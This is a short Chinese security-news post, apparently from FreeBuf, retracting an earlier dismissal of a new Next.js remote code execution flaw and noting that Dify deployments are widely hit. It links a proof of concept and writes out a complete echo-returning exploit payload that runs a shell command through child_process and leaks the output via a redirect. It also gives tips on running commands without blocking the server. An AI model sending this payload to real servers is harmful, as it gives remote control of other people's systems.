就在昨天我还发了一篇文章指责核弹,最新Next.js rce漏洞是核弹?实则跳蛋......无良公众号为了流量脸都不要,没想到光速反转打脸。在最新的利用中,dify成为重灾区,利用成功率较高,github的poc:
https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3此poc为无回显rce,最新已出现有回显的exp:
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}各位在测试中需要注意,应尽量避免使用execSync函数执行可能造成系统阻塞的命令(如ping,curl,wget等),因为Node.js是单线程事件循环模型,execSync会阻塞整个事件循环,导致所有请求都被阻塞。推荐使用异步exec。
在此向昨天文章中被提起的独眼情报道歉,这确实是影响面较大的漏洞,虽然还是无法与log4j2比较,但昨天文章中对独眼情报的评价有误,在此致歉。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf
客服小蜜蜂(微信:freebee1024)



